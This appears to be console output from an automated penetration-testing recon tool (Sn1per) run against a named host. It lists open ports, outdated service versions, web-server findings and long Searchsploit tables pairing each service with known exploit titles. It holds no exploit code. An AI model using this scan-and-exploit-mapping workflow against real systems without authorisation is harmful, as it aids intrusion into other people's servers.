  2688. + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var
  2689. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
  2690. + Uncommon header 'tcn' found, with contents: choice
  2691. + OSVDB-3092: /manual/: Web server manual found.
  2692. + OSVDB-3268: /icons/: Directory indexing found.
  2693. + OSVDB-3268: /manual/images/: Directory indexing found.
  2694. + OSVDB-3233: /icons/README: Apache default file found.
  2695. + 8263 requests: 6 error(s) and 12 item(s) reported on remote host
  2696. + End Time:           2017-10-16 19:46:06 (GMT-4) (1124 seconds)
  2697. ---------------------------------------------------------------------------
  2698. + 1 host(s) tested
  2699.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
  2700. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/tinymodel-sugar.info-port80.jpg
  2701.  + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
  2702.  + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
  2703.  
  2704.     _____  .701F. .iBR.   .7CL. .70BR.   .7BR. .7BR'''Cq.   .70BR.      .1BR'''Yp, .8BR'''Cq.  
  2705.    (_____)   01     01N.    C     01       C     01   .01.    01          01    Yb   01   .01.
  2706.    (() ())   01     C YCb   C     01       C     01   ,C9     01          01    dP   01   ,C9  
  2707.     \   /    01     C  .CN. C     01       C     0101dC9      01          01'''bg.   0101dC9  
  2708.      \ /     01     C   .01.C     01       C     01  YC.      01      ,   01    .Y   01  YC.  
  2709.      /=\     01     C     Y01     YC.     ,C     01   .Cb.    01     ,C   01    ,9   01   .Cb.
  2710.     [___]  .J01L. .JCL.    YC      .b0101d'.   .J01L. .J01. .J01010101C .J0101Cd9  .J01L. .J01./ 2.1
  2711.  
  2712. __[ ! ] Neither war between hackers, nor peace for the system.
  2713. __[ ! ] http://blog.inurl.com.br
  2714. __[ ! ] http://fb.com/InurlBrasil
  2715. __[ ! ] http://twitter.com/@googleinurl
  2716. __[ ! ] http://github.com/googleinurl
  2717. __[ ! ] Current PHP version::[ 7.0.22-3 ]
  2718. __[ ! ] Current script owner::[ root ]
  2719. __[ ! ] Current uname::[ Linux Kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.4-1kali1 (2017-10-03) x86_64 ]
  2720. __[ ! ] Current pwd::[ /usr/share/sniper ]
  2721. __[ ! ] Help: php inurlbr.php --help
  2722. ------------------------------------------------------------------------------------------------------------------------
  2723.  
  2724. [ ! ] Starting SCANNER INURLBR 2.1 at [16-10-2017 19:46:57]
  2725. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  2726. It is the end user's responsibility to obey all applicable local, state and federal laws.
  2727. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  2728.  
  2729. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-tinymodel-sugar.info.txt  ]
  2730. [ INFO ][ DORK ]::[ site:tinymodel-sugar.info ]
  2731. [ INFO ][ SEARCHING ]:: {
  2732. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.co.nz ]
  2733.  
  2734. [ INFO ][ SEARCHING ]:: 
  2735. -[:::]
  2736. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  2737.  
  2738. [ INFO ][ SEARCHING ]:: 
  2739. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  2740. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.co.id ID: 012347377894689429761:wgkj5jn9ee4 ]
  2741.  
  2742. [ INFO ][ SEARCHING ]:: 
  2743. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  2744.  
  2745. [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
  2746. [ INFO ] Not a satisfactory result was found!
  2747.  
  2748.  
  2749. [ INFO ] [ Shutting down ]
  2750. [ INFO ] [ End of process INURLBR at [16-10-2017 19:47:08]
  2751. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  2752. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-tinymodel-sugar.info.txt  ]
  2753. |_________________________________________________________________________________________
  2754.  
  2755. \_________________________________________________________________________________________/
  2756.  
  2757.  + -- --=[Port 110 closed... skipping.
  2758.  + -- --=[Port 111 opened... running tests...
  2759.  + -- --=[Port 135 closed... skipping.
  2760.  + -- --=[Port 139 closed... skipping.
  2761.  + -- --=[Port 161 closed... skipping.
  2762.  + -- --=[Port 162 closed... skipping.
  2763.  + -- --=[Port 389 closed... skipping.
  2764.  + -- --=[Port 443 closed... skipping.
  2765.  + -- --=[Port 445 closed... skipping.
  2766.  + -- --=[Port 512 closed... skipping.
  2767.  + -- --=[Port 513 closed... skipping.
  2768.  + -- --=[Port 514 closed... skipping.
  2769.  + -- --=[Port 623 closed... skipping.
  2770.  + -- --=[Port 624 closed... skipping.
  2771.  + -- --=[Port 1099 closed... skipping.
  2772.  + -- --=[Port 1433 closed... skipping.
  2773.  + -- --=[Port 2049 closed... skipping.
  2774.  + -- --=[Port 2121 closed... skipping.
  2775.  + -- --=[Port 3306 closed... skipping.
  2776.  + -- --=[Port 3310 closed... skipping.
  2777.  + -- --=[Port 3128 opened... running tests...
  2778.  
  2779. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-16 19:47 EDT
  2780. Nmap scan report for tinymodel-sugar.info (94.102.49.50)
  2781. Host is up (0.12s latency).
  2782. Other addresses for tinymodel-sugar.info (not scanned): 94.102.49.48
  2783. rDNS record for 94.102.49.50: no-reverse-dns-configured.com
  2784.  
  2785. PORT     STATE SERVICE    VERSION
  2786. 3128/tcp open  http-proxy Squid http proxy 2.7.STABLE3
  2787. |_http-server-header: squid/2.7.STABLE3
  2788. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  2789. Device type: general purpose|switch|remote management|printer|firewall|security-misc|specialized|media device
  2790. Running (JUST GUESSING): Linux 3.X|2.6.X|2.4.X (95%), Extreme Networks ExtremeXOS 12.X (93%), HP embedded (93%), HP Onboard Administrator 4.X (92%), Kyocera embedded (92%), Barracuda Networks embedded (92%), Sony embedded (90%)
  2791. OS CPE: cpe:/o:linux:linux_kernel:3.2.0 cpe:/o:linux:linux_kernel:2.6 cpe:/o:extremenetworks:extremexos:12.5.4 cpe:/a:hp:onboard_administrator:2.04 cpe:/a:hp:onboard_administrator:4 cpe:/h:kyocera:cs-2560 cpe:/o:linux:linux_kernel:2.4.21
  2792. Aggressive OS guesses: Linux 3.2.0 (95%), Linux 2.6.15 - 2.6.26 (likely embedded) (94%), Linux 2.6.18 - 2.6.22 (94%), Extreme Networks ExtremeXOS 12.5.4 (93%), HP Onboard Administrator 2.04 (93%), HP Onboard Administrator 2.25 - 3.31 (93%), Linux 2.6.15 (Ubuntu) (93%), Linux 2.6.16 (93%), HP Onboard Administrator 4.01 (92%), HP Onboard Administrator 4.12 - 4.40 (92%)
  2793. No exact OS matches for host (test conditions non-ideal).
  2794. Network Distance: 7 hops
  2795.  
  2796. TRACEROUTE (using port 3128/tcp)
  2797. HOP RTT       ADDRESS
  2798. 1   110.20 ms 10.13.0.1
  2799. 2   ...
  2800. 3   110.25 ms po101.gra-g2-a75.fr.eu (178.33.103.231)
  2801. 4   ...
  2802. 5   116.72 ms be100-1112.ams-5-a9.nl.eu (213.251.128.67)
  2803. 6   ...
  2804. 7   117.25 ms no-reverse-dns-configured.com (94.102.49.50)
  2805.  
  2806. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2807. Nmap done: 1 IP address (1 host up) scanned in 28.80 seconds
  2808.  + -- --=[Port 3389 closed... skipping.
  2809.  + -- --=[Port 3632 closed... skipping.
  2810.  + -- --=[Port 4443 closed... skipping.
  2811.  + -- --=[Port 5432 closed... skipping.
  2812.  + -- --=[Port 5800 closed... skipping.
  2813.  + -- --=[Port 5900 closed... skipping.
  2814.  + -- --=[Port 5984 closed... skipping.
  2815.  + -- --=[Port 6000 closed... skipping.
  2816.  + -- --=[Port 6667 closed... skipping.
  2817.  + -- --=[Port 8000 closed... skipping.
  2818.  + -- --=[Port 8100 closed... skipping.
  2819.  + -- --=[Port 8080 closed... skipping.
  2820.  + -- --=[Port 8180 closed... skipping.
  2821.  + -- --=[Port 8443 closed... skipping.
  2822.  + -- --=[Port 8888 closed... skipping.
  2823.  + -- --=[Port 10000 closed... skipping.
  2824.  + -- --=[Port 16992 closed... skipping.
  2825.  + -- --=[Port 27017 closed... skipping.
  2826.  + -- --=[Port 27018 closed... skipping.
  2827.  + -- --=[Port 27019 closed... skipping.
  2828.  + -- --=[Port 28017 closed... skipping.
  2829.  + -- --=[Port 49152 closed... skipping.
  2830.  + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +
  2831.  + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +
  2832.  
  2833. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-16 19:47 EDT
  2834. NSE: Loaded 42 scripts for scanning.
  2835. Initiating Parallel DNS resolution of 1 host. at 19:47
  2836. Completed Parallel DNS resolution of 1 host. at 19:47, 0.06s elapsed
  2837. Initiating SYN Stealth Scan at 19:47
  2838. Scanning tinymodel-sugar.info (94.102.49.50) [65355 ports]
  2839. Discovered open port 111/tcp on 94.102.49.50
  2840. Discovered open port 22/tcp on 94.102.49.50
  2841. Discovered open port 80/tcp on 94.102.49.50
  2842. Discovered open port 21/tcp on 94.102.49.50
  2843. Increasing send delay for 94.102.49.50 from 0 to 5 due to 16 out of 39 dropped probes since last increase.
  2844. Increasing send delay for 94.102.49.50 from 5 to 10 due to 17 out of 42 dropped probes since last increase.
  2845. Warning: 94.102.49.50 giving up on port because retransmission cap hit (6).
  2846. SYN Stealth Scan Timing: About 0.70% done
  2847. SYN Stealth Scan Timing: About 1.29% done; ETC: 21:06 (1:18:04 remaining)
  2848. SYN Stealth Scan Timing: About 2.06% done; ETC: 21:01 (1:12:07 remaining)
  2849. SYN Stealth Scan Timing: About 2.76% done; ETC: 21:06 (1:16:16 remaining)
  2850. SYN Stealth Scan Timing: About 4.28% done; ETC: 21:02 (1:11:59 remaining)
  2851. SYN Stealth Scan Timing: About 5.92% done; ETC: 20:59 (1:07:46 remaining)
  2852. SYN Stealth Scan Timing: About 6.92% done; ETC: 20:56 (1:04:07 remaining)
  2853. SYN Stealth Scan Timing: About 8.28% done; ETC: 20:53 (1:00:33 remaining)
  2854. SYN Stealth Scan Timing: About 9.80% done; ETC: 20:51 (0:57:12 remaining)
  2855. SYN Stealth Scan Timing: About 11.59% done; ETC: 20:48 (0:53:55 remaining)
  2856. SYN Stealth Scan Timing: About 14.14% done; ETC: 20:46 (0:50:49 remaining)
  2857. SYN Stealth Scan Timing: About 17.19% done; ETC: 20:45 (0:47:47 remaining)
  2858. Discovered open port 3128/tcp on 94.102.49.50
  2859. SYN Stealth Scan Timing: About 20.57% done; ETC: 20:44 (0:44:52 remaining)
  2860. SYN Stealth Scan Timing: About 24.19% done; ETC: 20:43 (0:42:02 remaining)
  2861. SYN Stealth Scan Timing: About 28.34% done; ETC: 20:42 (0:39:14 remaining)
  2862. Discovered open port 33832/tcp on 94.102.49.50
  2863. Discovered open port 3129/tcp on 94.102.49.50
  2864. SYN Stealth Scan Timing: About 32.56% done; ETC: 20:41 (0:36:29 remaining)
  2865. SYN Stealth Scan Timing: About 36.94% done; ETC: 20:41 (0:33:45 remaining)
  2866. SYN Stealth Scan Timing: About 46.30% done; ETC: 20:45 (0:31:02 remaining)
  2867. SYN Stealth Scan Timing: About 50.64% done; ETC: 20:44 (0:28:08 remaining)
  2868. Discovered open port 47640/tcp on 94.102.49.50
  2869. SYN Stealth Scan Timing: About 54.95% done; ETC: 20:43 (0:25:14 remaining)
  2870. SYN Stealth Scan Timing: About 59.75% done; ETC: 20:43 (0:22:25 remaining)
  2871. SYN Stealth Scan Timing: About 65.94% done; ETC: 20:45 (0:19:37 remaining)
  2872. SYN Stealth Scan Timing: About 71.54% done; ETC: 20:46 (0:16:44 remaining)
  2873. SYN Stealth Scan Timing: About 76.81% done; ETC: 20:47 (0:13:47 remaining)
  2874. SYN Stealth Scan Timing: About 81.95% done; ETC: 20:47 (0:10:48 remaining)
  2875. Discovered open port 1080/tcp on 94.102.49.50
  2876. SYN Stealth Scan Timing: About 87.31% done; ETC: 20:49 (0:07:48 remaining)
  2877. SYN Stealth Scan Timing: About 92.34% done; ETC: 20:48 (0:04:41 remaining)
  2878. SYN Stealth Scan Timing: About 97.34% done; ETC: 20:48 (0:01:37 remaining)
  2879. Completed SYN Stealth Scan at 21:00, 4383.69s elapsed (65355 total ports)
  2880. Initiating Service scan at 21:00
  2881. Scanning 9 services on tinymodel-sugar.info (94.102.49.50)
  2882. Completed Service scan at 21:02, 95.72s elapsed (9 services on 1 host)
  2883. Initiating OS detection (try #1) against tinymodel-sugar.info (94.102.49.50)
  2884. Retrying OS detection (try #2) against tinymodel-sugar.info (94.102.49.50)
  2885. NSE: Script scanning 94.102.49.50.
  2886. Initiating NSE at 21:02
  2887. Completed NSE at 21:02, 1.25s elapsed
  2888. Initiating NSE at 21:02
  2889. Completed NSE at 21:02, 1.00s elapsed
  2890. Nmap scan report for tinymodel-sugar.info (94.102.49.50)
  2891. Host is up (0.13s latency).
  2892. Other addresses for tinymodel-sugar.info (not scanned): 94.102.49.48
  2893. rDNS record for 94.102.49.50: no-reverse-dns-configured.com
  2894. Not shown: 65213 closed ports, 133 filtered ports
  2895. PORT      STATE SERVICE     VERSION
  2896. 21/tcp    open  ftp         vsftpd 2.0.7
  2897. 22/tcp    open  ssh         OpenSSH 5.1p1 Debian 5 (protocol 2.0)
  2898. 80/tcp    open  http        nginx 1.0.6
  2899. 111/tcp   open  rpcbind     2 (RPC #100000)
  2900. 1080/tcp  open  socks5      (No acceptable authentication method)
  2901. 3128/tcp  open  http-proxy  Squid http proxy 2.7.STABLE3
  2902. 3129/tcp  open  socks-proxy Socks4A
  2903. 33832/tcp open  status      1 (RPC #100024)
  2904. 47640/tcp open  unknown
  2905. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  2906. SF-Port3129-TCP:V=7.60%I=7%D=10/16%Time=59E55641%P=x86_64-pc-linux-gnu%r(N
  2907. SF:ULL,8,"\0\[\0\0\0\0\0\0")%r(mydoom,8,"\0\[\0\0\0\0\0\0");
  2908. Aggressive OS guesses: Extreme Networks ExtremeXOS 12.5.4 (94%), Linux 2.6.15 (Ubuntu) (94%), Linux 2.6.15 - 2.6.26 (likely embedded) (94%), Barracuda Web Application Firewall 460 (94%), Linux 2.6.16 (94%), Kyocera CopyStar CS-2560 printer (93%), Linux 2.6.26 (93%), Linux 2.6.32 (92%), Linux 2.6.23 (92%), Barracuda Web Filter (92%)
  2909. No exact OS matches for host (test conditions non-ideal).
  2910. Uptime guess: 80.382 days (since Fri Jul 28 11:52:30 2017)
  2911. Network Distance: 7 hops
  2912. TCP Sequence Prediction: Difficulty=205 (Good luck!)
  2913. IP ID Sequence Generation: All zeros
  2914. Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
  2915.  
  2916. Read data files from: /usr/bin/../share/nmap
  2917. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2918. Nmap done: 1 IP address (1 host up) scanned in 4491.65 seconds
  2919.            Raw packets sent: 196115 (8.634MB) | Rcvd: 195285 (7.818MB)
  2920.  + -- ----------------------------=[Enumerating Exploits via Searchsploit]=--- -- +
  2921. [i] Reading: '/usr/share/sniper/loot/nmap/nmap-tinymodel-sugar.info.xml'
  2922.  
  2923. --------------------------------------------- ----------------------------------
  2924.  Exploit Title                               |  Path
  2925.                                              | (/usr/share/exploitdb/platforms/)
  2926. --------------------------------------------- ----------------------------------
  2927. vsftpd 2.0.5 - 'CWD' Authenticated Remote Me | linux/dos/5814.pl
  2928. vsftpd 2.0.5 - 'deny_file' Option Remote Den | windows/dos/31818.sh
  2929. vsftpd 2.0.5 - 'deny_file' Option Remote Den | windows/dos/31819.pl
  2930. vsftpd 2.3.2 - Denial of Service             | linux/dos/16270.c
  2931. vsftpd 2.3.4 - Backdoor Command Execution (M | unix/remote/17491.rb
  2932. --------------------------------------------- ----------------------------------
  2933. --------------------------------------------- ----------------------------------
  2934.  Exploit Title                               |  Path
  2935.                                              | (/usr/share/exploitdb/platforms/)
  2936. --------------------------------------------- ----------------------------------
  2937. vsftpd 2.0.5 - 'CWD' Authenticated Remote Me | linux/dos/5814.pl
  2938. vsftpd 2.0.5 - 'deny_file' Option Remote Den | windows/dos/31818.sh
  2939. vsftpd 2.0.5 - 'deny_file' Option Remote Den | windows/dos/31819.pl
  2940. vsftpd 2.3.2 - Denial of Service             | linux/dos/16270.c
  2941. vsftpd 2.3.4 - Backdoor Command Execution (M | unix/remote/17491.rb
  2942. --------------------------------------------- ----------------------------------
  2943. --------------------------------------------- ----------------------------------
  2944.  Exploit Title                               |  Path
  2945.                                              | (/usr/share/exploitdb/platforms/)
  2946. --------------------------------------------- ----------------------------------
  2947. vsftpd 2.0.5 - 'CWD' Authenticated Remote Me | linux/dos/5814.pl
  2948. vsftpd 2.0.5 - 'deny_file' Option Remote Den | windows/dos/31818.sh
  2949. vsftpd 2.0.5 - 'deny_file' Option Remote Den | windows/dos/31819.pl
  2950. --------------------------------------------- ----------------------------------
  2951. --------------------------------------------- ----------------------------------
  2952.  Exploit Title                               |  Path
  2953.                                              | (/usr/share/exploitdb/platforms/)
  2954. --------------------------------------------- ----------------------------------
  2955. Debian OpenSSH - Authenticated Remote SELinu | linux/remote/6094.txt
  2956. Dropbear / OpenSSH Server - 'MAX_UNAUTH_CLIE | multiple/dos/1572.pl
  2957. FreeBSD OpenSSH 3.5p1 - Remote Command Execu | freebsd/remote/17462.txt
  2958. Novell Netware 6.5 - OpenSSH Remote Stack Ov | novell/dos/14866.txt
  2959. OpenSSH 1.2 - '.scp' File Create/Overwrite   | linux/remote/20253.sh
  2960. OpenSSH 2.x/3.0.1/3.0.2 - Channel Code Off-b | unix/remote/21314.txt
  2961. OpenSSH 2.x/3.x - Kerberos 4 TGT/AFS Token B | linux/remote/21402.txt
  2962. OpenSSH 3.x - Challenge-Response Buffer Over | unix/remote/21578.txt
  2963. OpenSSH 3.x - Challenge-Response Buffer Over | unix/remote/21579.txt
  2964. OpenSSH 4.3 p1 - (Duplicated Block) Remote D | multiple/dos/2444.sh
  2965. OpenSSH 6.8 < 6.9 - 'PTY' Privilege Escalati | linux/local/41173.c
  2966. OpenSSH 7.2 - Denial of Service              | linux/dos/40888.py
  2967. OpenSSH 7.2p1 - Authenticated xauth Command  | multiple/remote/39569.py
  2968. OpenSSH 7.2p2 - Username Enumeration         | linux/remote/40136.py
  2969. OpenSSH < 7.4 - 'UsePrivilegeSeparation Disa | linux/local/40962.txt
  2970. OpenSSH < 7.4 - agent Protocol Arbitrary Lib | linux/remote/40963.txt
  2971. OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote User | linux/remote/26.sh
  2972. OpenSSH/PAM 3.6.1p1 - Remote Users Discovery | linux/remote/25.c
  2973. OpenSSHd 7.2p2 - Username Enumeration (PoC)  | linux/remote/40113.txt
  2974. Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timin | multiple/remote/3303.sh
  2975. glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - | linux/local/258.sh
  2976. --------------------------------------------- ----------------------------------
  2977. --------------------------------------------- ----------------------------------
  2978.  Exploit Title                               |  Path
  2979.                                              | (/usr/share/exploitdb/platforms/)
  2980. --------------------------------------------- ----------------------------------
  2981. FreeBSD OpenSSH 3.5p1 - Remote Command Execu | freebsd/remote/17462.txt
  2982. Novell Netware 6.5 - OpenSSH Remote Stack Ov | novell/dos/14866.txt
  2983. --------------------------------------------- ----------------------------------
  2984. --------------------------------------------- ----------------------------------
  2985.  Exploit Title                               |  Path
  2986.                                              | (/usr/share/exploitdb/platforms/)
  2987. --------------------------------------------- ----------------------------------
  2988. Nginx (Debian-Based Distros + Gentoo) - 'log | linux/local/40768.sh
  2989. Nginx 0.6.36 - Directory Traversal           | multiple/remote/12804.txt
  2990. Nginx 0.6.38 - Heap Corruption               | linux/local/14830.py
  2991. Nginx 0.6.x - Arbitrary Code Execution NullB | multiple/webapps/24967.txt
  2992. Nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5. | linux/dos/9901.txt
  2993. Nginx 0.7.61 - WebDAV Directory Traversal    | multiple/remote/9829.txt
  2994. Nginx 0.7.64 - Terminal Escape Sequence in L | multiple/remote/33490.txt
  2995. Nginx 0.7.65/0.8.39 (dev) - Source Disclosur | windows/remote/13822.txt
  2996. Nginx 0.8.36 - Source Disclosure / Denial of | windows/remote/13818.txt
  2997. Nginx 1.1.17 - URI Processing SecURIty Bypas | multiple/remote/38846.txt
  2998. Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stac | linux/remote/25775.rb
  2999. Nginx 1.3.9 < 1.4.0 - Denial of Service (PoC | linux/dos/25499.py
  3000. Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote | lin_x86/remote/26737.pl
  3001. Nginx 1.4.0 (Generic Linux x64) - Remote Exp | lin_x86-64/remote/32277.txt
  3002. --------------------------------------------- ----------------------------------
  3003. --------------------------------------------- ----------------------------------
  3004.  Exploit Title                               |  Path
  3005.                                              | (/usr/share/exploitdb/platforms/)
  3006. --------------------------------------------- ----------------------------------
  3007. Nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5. | linux/dos/9901.txt
  3008. Nginx 0.7.61 - WebDAV Directory Traversal    | multiple/remote/9829.txt
  3009. Nginx 1.1.17 - URI Processing SecURIty Bypas | multiple/remote/38846.txt
  3010. Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stac | linux/remote/25775.rb
  3011. Nginx 1.3.9 < 1.4.0 - Denial of Service (PoC | linux/dos/25499.py
  3012. Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote | lin_x86/remote/26737.pl
  3013. Nginx 1.4.0 (Generic Linux x64) - Remote Exp | lin_x86-64/remote/32277.txt
  3014. --------------------------------------------- ----------------------------------
  3015. --------------------------------------------- ----------------------------------
  3016.  Exploit Title                               |  Path
  3017.                                              | (/usr/share/exploitdb/platforms/)
  3018. --------------------------------------------- ----------------------------------
  3019. Nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5. | linux/dos/9901.txt
  3020. Nginx 0.7.61 - WebDAV Directory Traversal    | multiple/remote/9829.txt
  3021. Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stac | linux/remote/25775.rb
  3022. Nginx 1.3.9 < 1.4.0 - Denial of Service (PoC | linux/dos/25499.py
  3023. Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote | lin_x86/remote/26737.pl
  3024. Nginx 1.4.0 (Generic Linux x64) - Remote Exp | lin_x86-64/remote/32277.txt
  3025. --------------------------------------------- ----------------------------------
  3026. --------------------------------------------- ----------------------------------
  3027.  Exploit Title                               |  Path
  3028.                                              | (/usr/share/exploitdb/platforms/)
  3029. --------------------------------------------- ----------------------------------
  3030. Nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5. | linux/dos/9901.txt
  3031. Nginx 0.7.61 - WebDAV Directory Traversal    | multiple/remote/9829.txt
  3032. Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote | lin_x86/remote/26737.pl
  3033. Nginx 1.4.0 (Generic Linux x64) - Remote Exp | lin_x86-64/remote/32277.txt
  3034. --------------------------------------------- ----------------------------------
  3035. --------------------------------------------- ----------------------------------
  3036.  Exploit Title                               |  Path
  3037.                                              | (/usr/share/exploitdb/platforms/)
  3038. --------------------------------------------- ----------------------------------
  3039. RPCBind / libtirpc - Denial of Service       | linux/dos/41974.rb
  3040. Wietse Venema Rpcbind Replacement 2.1 - Deni | unix/dos/20376.txt
  3041. rpcbind - (CALLIT procedure) UDP Crash (PoC) | linux/dos/26887.rb
  3042. --------------------------------------------- ----------------------------------
  3043. --------------------------------------------- ----------------------------------
  3044.  Exploit Title                               |  Path
  3045.                                              | (/usr/share/exploitdb/platforms/)
  3046. --------------------------------------------- ----------------------------------
  3047. Wietse Venema Rpcbind Replacement 2.1 - Deni | unix/dos/20376.txt
  3048. --------------------------------------------- ----------------------------------
  3049. --------------------------------------------- ----------------------------------
  3050.  Exploit Title                               |  Path
  3051.                                              | (/usr/share/exploitdb/platforms/)
  3052. --------------------------------------------- ----------------------------------
  3053. XChat 1.8.0/2.0.8 socks5 - Remote Buffer Ove | linux/remote/296.c
  3054. --------------------------------------------- ----------------------------------
  3055. --------------------------------------------- ----------------------------------
  3056.  Exploit Title                               |  Path
  3057.                                              | (/usr/share/exploitdb/platforms/)
  3058. --------------------------------------------- ----------------------------------
  3059. MySQL Squid Access Report 2.1.4 - HTML Injec | php/webapps/20055.txt
  3060. National Science Foundation Squid Proxy 2.3  | linux/remote/24105.txt
  3061. National Science Foundation Squid Web Proxy  | linux/remote/19567.txt
  3062. PageSquid CMS 0.3 Beta - 'index.php' SQL Inj | php/webapps/5899.txt
  3063. Squid - 'httpMakeVaryMark()' Function Remote | linux/dos/38365.txt
  3064. Squid - NTLM Authenticate Overflow (Metasplo | linux/remote/16847.rb
  3065. Squid 2.0-4 - Cache FTP Proxy URL Buffer Ove | unix/remote/21297.c
  3066. Squid 2.4.1 - Remote Buffer Overflow         | linux/remote/347.c
  3067. Squid 2.5.x/3.x - NTLM Buffer Overflow (Meta | multiple/remote/9951.rb
  3068. Squid 3.3.5 - Denial of Service (PoC)        | linux/dos/26886.pl
  3069. Squid < 3.1 5 - HTTP Version Number Parsing  | multiple/dos/8021.pl
  3070. Squid Proxy 2.4/2.5 - NULL URL Character Una | linux/remote/23777.txt
  3071. Squid Proxy 2.5/2.6 - FTP URI Remote Denial  | linux/dos/29473.txt
  3072. Squid Web Proxy 2.2 - cachemgr.cgi Unauthori | cgi/remote/20465.sh
  3073. Squid Web Proxy 2.3 - Reverse Proxy          | linux/remote/21017.txt
  3074. SquidGuard 1.4 - Long URL Handling Remote De | xml/dos/37685.txt
  3075. SquidGuard 1.x - NULL URL Character Unauthor | linux/remote/23848.txt
  3076. --------------------------------------------- ----------------------------------
  3077. --------------------------------------------- ----------------------------------
  3078.  Exploit Title                               |  Path
  3079.                                              | (/usr/share/exploitdb/platforms/)
  3080. --------------------------------------------- ----------------------------------
  3081. Squid - 'httpMakeVaryMark()' Function Remote | linux/dos/38365.txt
  3082. Squid < 3.1 5 - HTTP Version Number Parsing  | multiple/dos/8021.pl
  3083. --------------------------------------------- ----------------------------------
  3084. --------------------------------------------- ----------------------------------
  3085.  Exploit Title                               |  Path
  3086.                                              | (/usr/share/exploitdb/platforms/)
  3087. --------------------------------------------- ----------------------------------
  3088. AnalogX Proxy 4.0 - Socks4A Buffer Overflow  | windows/remote/21589.pl
  3089. --------------------------------------------- ----------------------------------
  3090. --------------------------------------------- ----------------------------------
  3091.  Exploit Title                               |  Path
  3092.                                              | (/usr/share/exploitdb/platforms/)
  3093. --------------------------------------------- ----------------------------------
  3094. Accellion FTA - getStatus verify_oauth_token | hardware/remote/37597.rb
  3095. AdminBot 9.0.5 - 'live_status.lib.php' Remot | php/webapps/4005.txt
  3096. Apache 2.4.7 (mod_status) - Scoreboard Handl | linux/dos/34133.txt
  3097. Apache mod_perl - 'Apache::Status' / 'Apache | multiple/remote/9993.txt
  3098. Apple Safari 1.2 Web Browser - TABLE Status  | osx/remote/24716.txt
  3099. Apple Safari Web Browser 1.x - HTML Form Sta | osx/dos/24843.txt
  3100. Cisco VoIP Phone CP-7940 3.x - Spoofed SIP S | hardware/remote/25949.pl
  3101. Dell SonicWALL Scrutinizer 9.0.1 - 'statusFi | php/webapps/20033.py
  3102. Dicshunary 0.1a - 'check_status.php' Remote  | php/webapps/2808.txt
  3103. EPSON Status Monitor 3 - Privilege Escalatio | windows/local/9305.txt
  3104. Google Chrome 3.0195.38 - Status Bar Obfusca | windows/dos/10879.html
  3105. HP Insight Diagnostics Online Edition 8.4 -  | php/webapps/34544.txt
  3106. HP Network Node Manager (NMM) i 9.10 - nnm/p | jsp/webapps/36356.txt
  3107. ICQ 6 - 'Personal Status Manager' Remote Buf | windows/dos/31656.txt
  3108. Ipswitch IMail 5.0.8/6.0/6.1 - IMonitor stat | windows/dos/19711.txt
  3109. Joomla! Component User Status - Local File I | php/webapps/11998.txt
  3110. Joomla! Component com_virtuemart - order_sta | php/webapps/11271.txt
  3111. MTink 0.9.x - Printer Status Monitor Environ | linux/local/22189.txt
  3112. MailEnable IMAPD 1.54 - STATUS Request Buffe | windows/remote/16485.rb
  3113. ManageEngine Desktop Central StatusUpdate -  | windows/remote/34594.rb
  3114. Microsoft Internet Explorer 5.0.1 - Mouse Ev | windows/remote/25095.txt
